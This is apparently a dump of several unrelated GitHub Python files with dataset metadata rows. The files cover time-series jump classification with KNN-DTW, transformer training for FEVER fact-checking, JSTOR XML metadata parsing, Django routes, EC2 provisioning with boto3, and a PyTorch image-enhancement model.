            temp = df[start:end]
            resample_data = resample(temp, n_samples=jump.n, replace=False,
                                     random_state=0).sort_index()
            df_list.append(resample_data.reset_index())
        return df_list

    def vis(self):
        """Scatter/line plots of every resampled cycle (raw vs smoothed)."""
        df_list = self.resample_df()
        a = (len(df_list) + 1) // 2
        b = 2
        plt.figure(figsize=(14, 22))
        for i in range(len(df_list)):
            plt.subplot(a, b, i + 1)
            plt.title('subplots {}{}{} : cycle {}'.format(a, b, i + 1, i + 1))
            plt.xlabel('frame number')
            plt.ylabel('Left angle ratio')
            sns.scatterplot(data=df_list[i], x=df_list[i].index, y='left angle ratio')
            sns.lineplot(data=df_list[i], x=df_list[i].index, y='smoothed')
        print('the process is done for the jump {}'.format(self.name))
# #%%
# # create lists to store the names of csv files
# # create jump cycle(manually select range, then autocorrect by algorithm)
# good_jump_cycle = [[154,309],[398,539],[651,786],[825,980],[1018,1158],[1188,1337],[1374,1524],[1555,1698],[1737,1881],[1895,2054]]
# # cycle1: [010262,010456], [010469, 010638], [010655,010821],[010829,010998],[010998,011163],[011168,011331], [011331, 011497],[011497,011659],[011670,011849],[011849,012015]
# inner_jump_cycle=[ [397,562],[562,742],[742,902],[902,1060],[1060,1232],[1232,1398],[1398,1583],[1583,1760]]
# # cycle1: [001550,001700], [001716, 001902], [001930,002095],[002128,002300],[002330,002520],[002540,002709], [002729, 002900],[002916,003078],[003085,03249]
# outer_jump_cycle = [[379,552],[579,767],[767,973],[991,1171],[1171,1351],[1364,1527],[1543,1697]]
#%%
class KnnDtw(object):
    """K-nearest-neighbour classifier for time series, using Dynamic Time
    Warping (DTW) as the pairwise distance.

    Arguments
    ---------
    n_neighbors : int, optional (default = 5)
        Number of neighbours used in the majority vote.
    max_warping_window : int, optional (default = 10000)
        Maximum |i - j| offset allowed on the DTW alignment path.
    subsample_step : int, optional (default = 1)
        Keep every `subsample_step`-th timepoint of each series
        (x[:, ::subsample_step]).
    """

    def __init__(self, n_neighbors=5, max_warping_window=10000, subsample_step=1):
        self.n_neighbors = n_neighbors
        self.max_warping_window = max_warping_window
        self.subsample_step = subsample_step

    def fit(self, x, l):
        """Store the training series `x` (n_samples, n_timepoints) and their
        labels `l` (n_samples,) — a lazy learner, no work happens here."""
        self.x = x
        self.l = l

    def _dtw_distance(self, ts_a, ts_b, d=lambda x, y: abs(x - y)):
        """DTW distance between two 1-D series.

        `d` is the pointwise metric; the configured warping window bounds
        how far the alignment path may stray from the diagonal.
        """
        ts_a, ts_b = np.array(ts_a), np.array(ts_b)
        M, N = len(ts_a), len(ts_b)

        # Cost matrix seeded with a huge value outside the warping band.
        cost = sys.maxsize * np.ones((M, N))
        cost[0, 0] = d(ts_a[0], ts_b[0])
        for i in range(1, M):
            cost[i, 0] = cost[i - 1, 0] + d(ts_a[i], ts_b[0])
        for j in range(1, N):
            cost[0, j] = cost[0, j - 1] + d(ts_a[0], ts_b[j])

        # Dynamic programming over the banded interior.
        for i in range(1, M):
            lo = max(1, i - self.max_warping_window)
            hi = min(N, i + self.max_warping_window)
            for j in range(lo, hi):
                best_prev = min(cost[i - 1, j - 1], cost[i, j - 1], cost[i - 1, j])
                cost[i, j] = best_prev + d(ts_a[i], ts_b[j])
        return cost[-1, -1]

    def _dist_matrix(self, x, y):
        """Pairwise DTW distance matrix between the rows of `x` and `y`.

        When `x` and `y` are the same array, only the upper triangle is
        computed and then mirrored with squareform.
        """
        step = self.subsample_step
        if np.array_equal(x, y):
            n = np.shape(x)[0]
            condensed = np.zeros((n * (n - 1)) // 2, dtype=np.double)
            k = 0
            for i in range(0, n - 1):
                for j in range(i + 1, n):
                    condensed[k] = self._dtw_distance(x[i, ::step], y[j, ::step])
                    k += 1
            return squareform(condensed)

        rows, cols = np.shape(x)[0], np.shape(y)[0]
        dm = np.zeros((rows, cols))
        for i in range(0, rows):
            for j in range(0, cols):
                dm[i, j] = self._dtw_distance(x[i, ::step], y[j, ::step])
        return dm

    def predict(self, x):
        """Predict a label for each row of `x`.

        Returns
        -------
        (labels, proba) : the majority-vote label per row and the fraction
        of the k neighbours that voted for it.
        """
        dm = self._dist_matrix(x, self.x)
        nearest = dm.argsort()[:, :self.n_neighbors]
        votes = self.l[nearest]
        vote_mode = mode(votes, axis=1)
        return vote_mode[0].ravel(), (vote_mode[1] / self.n_neighbors).ravel()
#%%
# Session names per jump-quality class; each maps to csv_files/<name>.csv.
good = ['good1', 'good2','good4','good6']
inner = ['inner1', 'inner2', 'inner3']
outer= ['outer1', 'outer2']

# list_info.txt holds one JSON-encoded list of [start, end] cycle ranges per
# session, in the same order as all_csv below.
with open('list_info.txt','r') as file:
    input_lines = [line.strip() for line in file]
all_csv = good+inner+outer
info = {}
info['name'] = all_csv
info['cycle'] = input_lines
#%%
# structure dataset for algorithm training
good_dataset = []
inner_dataset = []
outer_dataset = []
n = 135  # samples per resampled cycle (mirrors jump.n)
for i in range(len(all_csv)):
    temp = jump(info['name'][i], json.loads(info['cycle'][i]))
    # temp.finetune()
    # temp.vis(n)
    # Route the resampled cycles into the bucket for this session's class.
    if i < len(good):
        good_dataset += temp.resample_df()
    elif i < len(good+inner):
        inner_dataset += temp.resample_df()
    else:
        outer_dataset += temp.resample_df()
# One flat list of per-cycle DataFrames, each tagged with a unique series_id.
total_x = good_dataset+inner_dataset+outer_dataset
for i in range(len(total_x)):
    total_x[i]['series_id'] = i
X = pd.concat(total_x)
#%%
# compare time series signal for good jump and bad (inner+outer) jump
# load the label file (note: the filename is spelled 'lable.csv' on disk)
y = pd.read_csv('csv_files/lable.csv')
label_encoder = LabelEncoder()
encoded_labels = label_encoder.fit_transform(y.jump)
y['label'] = encoded_labels
#%%
# create feature column
# NOTE(review): assumes the first two columns are non-feature columns
# (reset index + original index) — verify against the CSV schema.
feature_columns = X.columns.tolist()[2:]
# construct sequence: one (features DataFrame, label) pair per jump cycle
sequences = []
for series_id, group in X.groupby('series_id'):
    sequence_features = group[feature_columns]
    label = y[y.series_id == series_id].iloc[0].label
    sequences.append((sequence_features, label))
def create_data(sequences, test_size = 0.2):
    """Split (features, label) sequence pairs into train/test arrays.

    Parameters
    ----------
    sequences : list of (DataFrame, label) pairs; each DataFrame must hold a
        'left angle ratio' column of length 135.
    test_size : float, fraction of sequences held out for testing.

    Returns
    -------
    train_X, test_X : object arrays of shape (n, 135) holding the series.
    train_y, test_y : 1-D label arrays.
    """
    # Fix: the split previously hard-coded test_size=0.2, silently ignoring
    # the caller's `test_size` argument.
    train_sequences, test_sequences = train_test_split(sequences, test_size=test_size)
    train_X = np.empty(shape=(len(train_sequences), 135), dtype='object')
    train_y = []
    test_X = np.empty(shape=(len(test_sequences), 135), dtype='object')
    test_y = []
    for i in range(len(train_sequences)):
        train_X[i][:] = train_sequences[i][0]['left angle ratio'].to_list()
        train_y.append(train_sequences[i][1])
    for i in range(len(test_sequences)):
        test_X[i][:] = test_sequences[i][0]['left angle ratio'].to_list()
        test_y.append(test_sequences[i][1])
    train_y = np.array(train_y)
    test_y = np.array(test_y)
    return train_X, test_X, train_y, test_y
#%%
# Repeated random train/test splits to estimate classifier performance.
iten = 20  # number of evaluation repetitions
score = 0
score_list = []
false_negative_rate = []
false_positive_rate = []
for i in range(iten):
    # 1-NN with a DTW warping window of 15 timepoints.
    m = KnnDtw(n_neighbors=1, max_warping_window=15)
    train_X, test_X, train_y, test_y = create_data(sequences)
    m.fit(train_X, train_y)
    label, proba = m.predict(test_X)
    temp_score = accuracy_score(label,test_y)
    # Per-split confusion-matrix rates (binary labels assumed by ravel()).
    tn, fp, fn, tp = confusion_matrix(test_y, label).ravel()
    false_positive_rate.append(fp/(fp+tn))
    false_negative_rate.append(fn/(fn + tp))
    score_list.append(temp_score)
    score += temp_score
# Averages over all repetitions.
print('the accuracy of the classifier: {}%'.format(score/iten*100))
print('false positive rate: {}'.format(np.mean(false_positive_rate)))
print('false negative rate: {}'.format(np.mean(false_negative_rate)))
| bfeng1/Jump-Classification-Project | aim2.py | aim2.py | py | 12,898 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "scipy.signal.savgol_filter",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "sklearn.utils.resample",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "mat... |
12118485844 | """Training a Transformer Builder model to be used for adversarial attacks."""
import argparse
import random
from functools import partial
from typing import Dict
import numpy as np
import torch
from sklearn.metrics import precision_recall_fscore_support, confusion_matrix
from torch.utils.data.sampler import BatchSampler
from tqdm import tqdm
from transformers import AdamW, get_constant_schedule_with_warmup
from transformers import BertForSequenceClassification
from transformers import BertTokenizer, BertConfig
from transformers import RobertaForSequenceClassification, RobertaConfig, \
RobertaTokenizer
from builders.data_loader import collate_fever, FeverDataset, \
BucketBatchSampler, sort_key
def train_model(model: torch.nn.Module,
                train_dl: BatchSampler, dev_dl: BatchSampler,
                optimizer: torch.optim.Optimizer,
                scheduler: torch.optim.lr_scheduler.LambdaLR,
                n_epochs: int) -> (Dict, Dict):
    """Fine-tune `model` for `n_epochs`, tracking the best dev macro-F1.

    Relies on the module-level `tokenizer` for the padding id.  Returns the
    state_dict of the best checkpoint and its metrics dict.
    """
    best_val = {'val_f1': 0}
    best_model_weights = None

    for ep in range(n_epochs):
        for step, batch in enumerate(tqdm(train_dl, desc='Training')):
            model.train()
            optimizer.zero_grad()
            token_ids, gold = batch[0], batch[1]
            loss, _ = model(token_ids,
                            attention_mask=token_ids != tokenizer.pad_token_id,
                            labels=gold)
            loss.backward()
            optimizer.step()
            scheduler.step()
            # Extra mid-epoch dev evaluations at fixed step numbers.
            if step in [600, 700, 100]:
                print(eval_model(model, dev_dl), flush=True)

        val_p, val_r, val_f1, val_loss = eval_model(model, dev_dl)
        current_val = {
            'val_f1': val_f1,
            'val_p': val_p,
            'val_r': val_r,
            'val_loss': val_loss,
            'ep': ep,
        }
        print(current_val, flush=True)
        if current_val['val_f1'] > best_val['val_f1']:
            best_val = current_val
            best_model_weights = model.state_dict()

    return best_model_weights, best_val
def eval_model(model: torch.nn.Module, test_dl: BatchSampler):
    """Evaluate *model* on *test_dl*; return (precision, recall, f1, mean loss).

    NOTE(review): reads the module-level ``args`` global (``args.labels``).
    """
    model.eval()
    loss_f = torch.nn.CrossEntropyLoss()
    with torch.no_grad():
        labels_all = []
        logits_all = []
        losses = []
        for batch in tqdm(test_dl, desc="Evaluation"):
            # NOTE(review): the attention mask here is ``batch[0] > 1`` while
            # training uses ``!= tokenizer.pad_token_id`` — these agree only
            # when the pad id is <= 1; confirm for the chosen tokenizer.
            loss, logits_val = model(batch[0],
                                     attention_mask=batch[0] > 1,
                                     labels=batch[1])
            # The model-internal loss is discarded and recomputed explicitly.
            loss = loss_f(logits_val, batch[1].long())
            losses.append(loss.item())
            labels_all += batch[1].detach().cpu().numpy().tolist()
            logits_all += logits_val.detach().cpu().numpy().tolist()
        prediction = np.argmax(np.asarray(logits_all).reshape(-1, args.labels),
                               axis=-1)
        p, r, f1, _ = precision_recall_fscore_support(labels_all, prediction,
                                                      average='macro')
        print(confusion_matrix(labels_all, prediction), flush=True)
        return p, r, f1, np.mean(losses)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", help="Flag for training on gpu",
action='store_true', default=False)
parser.add_argument("--seed", help="Random seed", type=int, default=73)
parser.add_argument("--labels",
help="2 labels if NOT ENOUGH INFO excluded, "
"3 otherwise",
type=int, default=3)
parser.add_argument("--train_dataset", help="Path to the train datasets",
default='data/train_nli.jsonl', type=str)
parser.add_argument("--dev_dataset", help="Path to the dev datasets",
default='data/dev_nli.jsonl', type=str)
parser.add_argument("--test_dataset", help="Path to the test datasets",
default='data/test_nli.jsonl', type=str)
parser.add_argument("--type", help="Type of transformer model",
choices=['bert', 'roberta'], default='bert')
parser.add_argument("--model_path",
help="Path where the model will be serialized",
default='ferver_bert', type=str)
parser.add_argument("--batch_size", help="Batch size", type=int, default=8)
parser.add_argument("--lr", help="Learning Rate", type=float, default=5e-5)
parser.add_argument("--epochs", help="Epochs number", type=int, default=4)
parser.add_argument("--mode", help="Mode for the script", type=str,
default='train', choices=['train', 'test'])
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.backends.cudnn.deterministic = True
np.random.seed(args.seed)
device = torch.device("cuda") if args.gpu else torch.device("cpu")
if args.type == 'bert':
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
transformer_config = BertConfig.from_pretrained('bert-base-uncased',
num_labels=args.labels)
model = BertForSequenceClassification(transformer_config).to(device)
else:
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
transformer_config = RobertaConfig.from_pretrained('roberta-base',
num_labels=args.labels) # , use_bfloat16=True
model = RobertaForSequenceClassification.from_pretrained('roberta-base',
config=transformer_config).to(
device)
collate_fn = partial(collate_fever, tokenizer=tokenizer, device=device)
print(args, flush=True)
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{
'params': [p for n, p in param_optimizer if
not any(nd in n for nd in no_decay)],
'weight_decay': 0.01
},
{
'params': [p for n, p in param_optimizer if
any(nd in n for nd in no_decay)], 'weight_decay': 0.0
}]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.lr)
if args.mode == 'test':
test = FeverDataset(args.test_dataset)
# print(Counter([_x['label'] for _x in test]).most_common(3))
test_dl = BucketBatchSampler(batch_size=args.batch_size,
sort_key=sort_key, dataset=test,
collate_fn=collate_fn)
checkpoint = torch.load(args.model_path)
model.load_state_dict(checkpoint['model'])
print(eval_model(model, test_dl))
else:
print("Loading datasets...")
train = FeverDataset(args.train_dataset)
dev = FeverDataset(args.dev_dataset)
# print(Counter([_x['label'] for _x in train]).most_common(3))
# print(Counter([_x['label'] for _x in dev]).most_common(3))
train_dl = BucketBatchSampler(batch_size=args.batch_size,
sort_key=sort_key,
dataset=train,
collate_fn=collate_fn)
dev_dl = BucketBatchSampler(batch_size=args.batch_size,
sort_key=sort_key, dataset=dev,
collate_fn=collate_fn)
num_train_optimization_steps = int(
args.epochs * len(train) / args.batch_size)
scheduler = get_constant_schedule_with_warmup(optimizer,
num_warmup_steps=0.05)
best_model_w, best_perf = train_model(model, train_dl, dev_dl,
optimizer, scheduler, args.epochs)
checkpoint = {
'performance': best_perf,
'args': vars(args),
'model': best_model_w,
}
print(best_perf)
print(args)
torch.save(checkpoint, args.model_path)
| copenlu/fever-adversarial-attacks | builders/train_transformer.py | train_transformer.py | py | 8,288 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "torch.nn",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.sampler.BatchSampler",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "torch.optim",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "... |
16534298320 | import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
class VizHelp():
    """Plotting helpers: prediction-vs-actual curves and MSE training curves."""

    def plotPredictions(self, predictions, targets, decoder_steps, epochs, file_name, show=True):
        """Plot predicted vs. actual scaled prices and save the figure.

        ``file_name`` is reduced to an upper-cased stock symbol (basename
        without extension) used in the title and the output path.
        """
        stock_name = file_name.split('.')[0].upper()
        if '/' in stock_name:
            stock_name = stock_name.split('/')[-1]
        plt.plot(targets, label='Actual')
        plt.plot(predictions, label='Predicted')
        plt.legend()
        plt.xlabel('Samples')
        plt.ylabel('Scaled Price')
        plt.title(f'Price Prediction {stock_name}: D={decoder_steps}, Epoch={epochs}', fontsize=14)
        # BUG FIX: build the path once so the log message matches the file
        # actually written (the original print omitted an underscore).
        out_path = f'plots/Test_{stock_name}_D{decoder_steps}_E{epochs}.png'
        print(f'Saving image to: {out_path}')
        plt.savefig(out_path)
        if show:
            plt.show()
        else:
            plt.close()

    def plotMSE(self, errors, decoder_steps, num_samples=1, name='', show=True):
        """Plot MSE against (fractional) epoch count and save the figure."""
        epoch_counts = [i/num_samples for i in range(len(errors))]
        plt.plot(epoch_counts, errors)
        plt.xlabel('Epochs')
        plt.ylabel('MSE')
        plt.title(f'MSE {name}: D={decoder_steps}', fontsize=14)
        # Same fix as plotPredictions: one path used for both log and savefig.
        out_path = f'plots/{name}_D{decoder_steps}_E{epoch_counts[-1]}.png'
        print(f'Saving image to: {out_path}')
        plt.savefig(out_path)
        if show:
            plt.show()
        else:
            plt.close()
{
"api_name": "seaborn.set",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot... |
16515258502 | """
ARGUMENTS: python3 ParseMetaFilesUpdated.py <path-to-jstor-data> <which-part> <how-many-parts> <output-path>
<how-many-parts>: for parallel processing, this should be the number of workers available to run the program; 1 if not running in parallel.
<which-part>: for parallel processing, this should be a unique number for each worker, from 1 to <how-many-parts>; 1 if not running in parallel.
USAGE: This program takes already-split dictionaries and reads in a batch of JSTOR article n-gram files to count the number of appearances of each n-gram in the dictionaries.
INPUT: JSTOR metadata files.
OUTPUT: A table in HDF5 format, indexed on 'file_name', consisting of 18 columns.
"""
import math
import os
import re
import sys
from tqdm import tqdm
from xml.etree import ElementTree as ET
import pandas as pd
# check if improper number of arguments; if so, return instructions and quit
if len(sys.argv) != 5:
print(__doc__)
exit()
# read in arguments from command line
JSTOR_HOME, NUM, NUM_CPUS, OUTPATH = sys.argv[1:]
NUM, NUM_CPUS = int(NUM), int(NUM_CPUS)
METADATA_HOME = os.path.join(JSTOR_HOME, 'metadata/')
path, dirs, files = next(os.walk(METADATA_HOME))
files = [(path + file) for file in files] # Add folder name "path" as prefix to file
NUM_EACH = math.ceil(len(files) / NUM_CPUS)
LEFT = (NUM - 1) * NUM_EACH
RIGHT = LEFT + NUM_EACH
files = files[LEFT:RIGHT]
def add(elem, attrs):
    """Recursively walk *elem*, recording text of the tags listed in
    ``attrs['df_cols']`` into the last row of ``attrs['elements']``.

    Hyphenated XML tags are renamed to their snake_case column names; author
    surnames and given names are accumulated into the shared lists in
    ``attrs`` (and, following the original design, written back onto the
    element and the row as lists).
    """
    elements = attrs['elements']
    surnames = attrs['surname']
    given_names = attrs['given-names']
    tag = elem.tag
    if tag in attrs['df_cols']:
        if tag == 'journal-id':
            tag = 'journal_id'
        elif tag == 'article':
            # The article type lives in the tag's attributes, not its text.
            article_attrs = elem.attrib
            article_type = article_attrs['article-type']
            tag = 'type'
            elem.text = article_type
        elif tag == 'journal-title':
            tag = 'journal_title'
        elif tag == 'article-id':
            tag = 'article_id'
        elif tag == 'article-name':
            tag = 'article_name'
        elif tag == 'surname':
            # BUG FIX: the original tested ``type(elem.text) == 'str'`` —
            # a type object compared to a string literal, which is always
            # False — so every surname was recorded as 'None'.
            if isinstance(elem.text, str):
                surnames.append(elem.text.split(',')[0])
            else:
                surnames.append('None')
            elem.text = surnames
        elif tag == 'given-names':
            tag = 'given_names'
            given_names.append(elem.text)
            elem.text = given_names
        elif tag == 'issue-id':
            tag = 'issue_id'
        elif tag == 'ns1:ref':
            tag = 'jstor_url'
        elif tag == 'p':
            tag = 'abstract'
        # Overwrite the placeholder in the newest (last) row for this column.
        len_list = len(elements[tag])
        elements[tag][len_list - 1] = elem.text
    for child in elem.findall('*'):
        add(child, attrs)
def xml2df(xml_files):
    """Transform JSTOR article XML files into a pandas DataFrame.

    Args:
        xml_files: list of complete file paths.
    Returns:
        df: DataFrame with one row per article; missing fields stay 'None'.
    """
    # One list per output column; a 'None' placeholder is appended per file
    # and then overwritten in place by add() for every tag that is present.
    all_records = {'type':[], 'journal_id':[], 'journal_title':[], 'issn':[], 'article_id':[], 'article_name':[], 'given_names':[], 'surname':[], 'day':[], 'month':[], 'year':[], 'volume':[], 'issue':[], 'issue_id':[], 'fpage':[], 'lpage':[], 'jstor_url':[], 'abstract':[]}
    attrs = {}
    attrs['elements'] = all_records
    attrs['surname'] = []
    attrs['given-names'] = []
    # XML tag names that add() recognises (pre-renaming).
    attrs['df_cols'] = ['article', 'journal-id', 'journal-title', 'issn', 'article-id', 'article-name', 'given-names', 'surname', 'day', 'month', 'year', 'volume', 'issue', 'issue-id', 'fpage', 'lpage', 'ns1:ref', 'p']
    for file in tqdm(xml_files):
        with open(file, 'rb') as f:
            t = ET.parse(f) # element tree
            root = t.getroot()
            # Start a fresh row of placeholders, then fill it recursively.
            for record in all_records:
                all_records[record].append('None')
            add(root, attrs)
    #print(all_records)
    print ('Start creating data frame')
    df = pd.DataFrame(all_records)
    return df
# This is definitely NOT a good practice. However, I'm trying not to break what's running properly.
def amend_df(df, files):
    """Add file_name, jstor_url, abstract and article_name columns to *df*,
    in place, by re-parsing each XML file in *files*.

    The row order of *df* must match the order of *files* (it does when *df*
    came from ``xml2df(files)``).
    """
    file_names = []
    jstor_urls = []
    abstracts = []
    article_names = []
    for file in tqdm(files):
        # Raw string: the original non-raw '\.' pattern relied on Python
        # passing the invalid escape through (a DeprecationWarning).
        file_names.append(re.findall(r'journal-article-.+\.xml', file)[0][:-4])
        with open(file, 'rb') as f:
            t = ET.parse(f) # element tree
            root = t.getroot()
        # find() returns None for a missing node (-> AttributeError on the
        # chained call); an empty attribute list raises IndexError. Catch
        # only those instead of the original bare ``except``.
        try:
            jstor_urls.append(root.find('front').find('article-meta').find('self-uri').items()[0][1])
        except (AttributeError, IndexError):
            jstor_urls.append('None')
        try:
            abstracts.append(root.find('front').find('article-meta').find('abstract').find('p').text)
        except AttributeError:
            abstracts.append('None')
        try:
            article_names.append(root.find('front').find('article-meta').find('title-group').find('article-title').text)
        except AttributeError:
            article_names.append('None')
    df.loc[:, 'file_name'] = file_names
    df.loc[:, 'jstor_url'] = jstor_urls
    df.loc[:, 'abstract'] = abstracts
    df.loc[:, 'article_name'] = article_names
print('Start processing')
df = xml2df(files)
print('Start amending')
amend_df(df, files)
# df.to_pickle('pickles/part{}.pickle'.format(n))
df.set_index('file_name').to_hdf(os.path.join(OUTPATH, 'part{}.h5'.format(NUM)), key='metadata', mode='w')
#df.set_index('file_name').to_pickle(os.path.join(OUTPATH, 'part{}.pickle'.format(NUM))) | h2researchgroup/dictionary_methods | code/ParseMetaFilesUpdated.py | ParseMetaFilesUpdated.py | py | 5,612 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number":... |
4615311890 | from django.urls import path
from . import views
# Route table for the main app: each entry maps a URL prefix to a page view.
urlpatterns = [
    path('', views.index, name = "home"),
    path('shop/', views.shop, name = "shop"),
    path('about/', views.about, name = "about"),
    path('contact/', views.contact, name = "contact"),
    path('faq/', views.faq, name = "faq"),
]
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
39647238473 |
from django.urls import path
from .views import newpost_add, post_list, post_detail, post_update,post_delete,about_page, post_like
# Blog URL routes; <int:id> captures the post primary key for the
# detail / update / delete / like views.
urlpatterns = [
    path('add', newpost_add, name='add'),
    path('', post_list, name='list'),
    path('detail/<int:id>', post_detail, name='detail'),
    path('update/<int:id>', post_update, name='update'),
    path('delete/<int:id>', post_delete, name='delete'),
    path('about', about_page, name='about'),
    path('like/<int:id>', post_like, name="post_like")
]
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "views.newpost_add",
"line_number": 6,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "views.post_list"... |
16772279994 | import urllib
import boto3
from botocore.exceptions import ClientError
ec2 = boto3.client("ec2")
def get_my_public_ip():
    """Return this machine's public IP address as reported by https://ident.me."""
    # BUG FIX: the module only does ``import urllib``, which does not load the
    # ``urllib.request`` submodule; the original worked by accident because
    # another library had imported it first. Import it explicitly here.
    import urllib.request

    # Close the HTTP response deterministically instead of leaking it.
    with urllib.request.urlopen('https://ident.me') as response:
        external_ip = response.read().decode('utf8')
    print('Public ip - ', external_ip)
    return external_ip
def create_key_pair(name):
    """Create an RSA EC2 key pair called *name* and save its private key.

    Writes the PEM material to ``<name>.pem`` in the working directory and
    returns the new KeyPairId, or None if the AWS call fails (e.g. the key
    pair already exists).
    """
    try:
        response = ec2.create_key_pair(
            KeyName=name,
            KeyType="rsa",
        )
        with open(f"{name}.pem", "w") as file:
            file.write(response.get("KeyMaterial"))
        print(f"{name} Key has been crated")
        return response.get("KeyPairId")
    except ClientError as e:
        # AWS-side failures are reported and swallowed; the caller gets None.
        print(e)
        return
def create_security_group(client, name, description, vpc_id):
    """Create a security group in *vpc_id* and return its GroupId.

    NOTE(review): this function is redefined verbatim further down in the
    module; the later (identical) definition is the one in effect at import
    time — one copy should be removed.
    """
    response = client.create_security_group(
        Description=description,
        GroupName=name,
        VpcId=vpc_id)
    group_id = response.get('GroupId')
    print('Security Group Id - ', group_id)
    return group_id
def add_ssh_access_sg(client, sg_id, ip_address):
    """Allow inbound SSH (TCP 22) on security group *sg_id* from one host.

    *ip_address* is a bare IPv4 address; it is narrowed to a /32 CIDR.
    """
    ip_address = f'{ip_address}/32'
    response = client.authorize_security_group_ingress(
        CidrIp=ip_address,
        FromPort=22,
        GroupId=sg_id,
        IpProtocol='tcp',
        ToPort=22,
    )
    # 'Return' is True when AWS accepted the rule.
    if response.get('Return'):
        print('Rule added successfully')
    else:
        print('Rule was not added')
def add_http_access_sg(client, sg_id):
    """Open inbound HTTP (TCP port 80) from anywhere on security group *sg_id*."""
    result = client.authorize_security_group_ingress(
        CidrIp='0.0.0.0/0',
        FromPort=80,
        GroupId=sg_id,
        IpProtocol='tcp',
        ToPort=80,
    )
    # 'Return' is True when AWS accepted the rule.
    outcome = 'Rule added successfully' if result.get('Return') else 'Rule was not added'
    print(outcome)
# NOTE(review): exact duplicate of create_security_group defined above;
# harmless because the bodies are identical, but one copy should be removed.
def create_security_group(client, name, description, vpc_id):
    """Create a security group in *vpc_id* and return its GroupId."""
    response = client.create_security_group(
        Description=description,
        GroupName=name,
        VpcId=vpc_id)
    group_id = response.get('GroupId')
    print('Security Group Id - ', group_id)
    return group_id
def create_instance(client, group_id, subnet_id):
    """Launch one t2.micro instance in *subnet_id* using security group *group_id*.

    NOTE(review): the AMI id, the 'my-key' key-pair name and the extra 10 GB
    gp2 volume are hard-coded; AMI ids are region-specific — confirm these
    exist in the target account/region before running.
    """
    response = client.run_instances(
        BlockDeviceMappings=[{'DeviceName': '/dev/sdh',
                              'Ebs': {'DeleteOnTermination': True,
                                      'VolumeSize': 10,
                                      'VolumeType': 'gp2',
                                      'Encrypted': False}
                              }],
        ImageId='ami-0022f774911c1d690',
        InstanceType='t2.micro',
        KeyName='my-key',
        InstanceInitiatedShutdownBehavior='terminate',
        MaxCount=1,
        MinCount=1,
        NetworkInterfaces=[
            {
                'AssociatePublicIpAddress': True,
                'DeleteOnTermination': True,
                'Description': 'string',
                'Groups': [
                    group_id
                ],
                'DeviceIndex':0,
                'SubnetId':subnet_id
            },
        ])
    for instance in response.get('Instances'):
        instance_id = instance.get('InstanceId')
        print('InstanceId - ', instance_id)
def main(vpc_id, subnet_id):
    """End-to-end flow: create a security group, open HTTP to the world and
    SSH to this machine's public IP, then launch an instance in *subnet_id*."""
    group_id = create_security_group(ec2, 'my', 'grp', vpc_id)
    add_http_access_sg(ec2, group_id)
    my_ip = get_my_public_ip()
    add_ssh_access_sg(ec2, group_id, my_ip)
    create_instance(ec2, group_id, subnet_id)
if __name__ == '__main__':
main("vpc-id", "subnet-id")
| annatezelashvili/AWS_Python_Automation | Tasks/Task10-11/create_ec2.py | create_ec2.py | py | 3,423 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.client",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "urllib.request.urlopen",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "urllib.request",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "botocore.excepti... |
6697035634 | from models.arch.network import Network
from torch.nn import functional as F
import torch
model = Network(stage=2, depth=8).cuda()
model.set_query_codebook()
model.load_state_dict(torch.load("./pretrained_models/LOLv1.pth"))
x = torch.ones(1, 3, 256, 256).cuda()
with torch.no_grad():
M = F.relu(x - model.thr_conv(x))
f1, f2, f3 = model.encode(x)
fq, distance_map = model.vq_64.forward_with_query(f3, model.query)
f1_d, f2_d, f3_d = model.decode(fq)
f1_cat = model.fusion_128([model.up_fusion_2(f3), f2, f2_d, model.down_fusion_local(f1), model.down_fusion_prior(f1_d)])
f1_f = model.decoder_128_fusion(f1_cat)
f1_f_wo_ba = f1_f
f1_f = f1_f + f1_f * model.BA_128(M)
f2_cat = torch.cat([model.up_fusion_3(f1_f), f1, f1_d, model.up_fusion_local(f2), model.up_fusion_prior(f2_d)])
f2_f = model.decoder_256_fusion(f2_cat)
f2_f = f2_f + f2_f * model.BA_256(M)
x_rec = model.conv_fusion_out(f2_f)
ckpt = torch.load("/home/liuyunlong/project/code/SNR-Aware-Low-Light-Enhance-main/ckpt.pth")
dic = {'feat_256': f1, 'feat_128': f2, 'feat_64': f3, 'feat_q': fq, 'decode_64': f3_d, 'decode_128': f2_d,
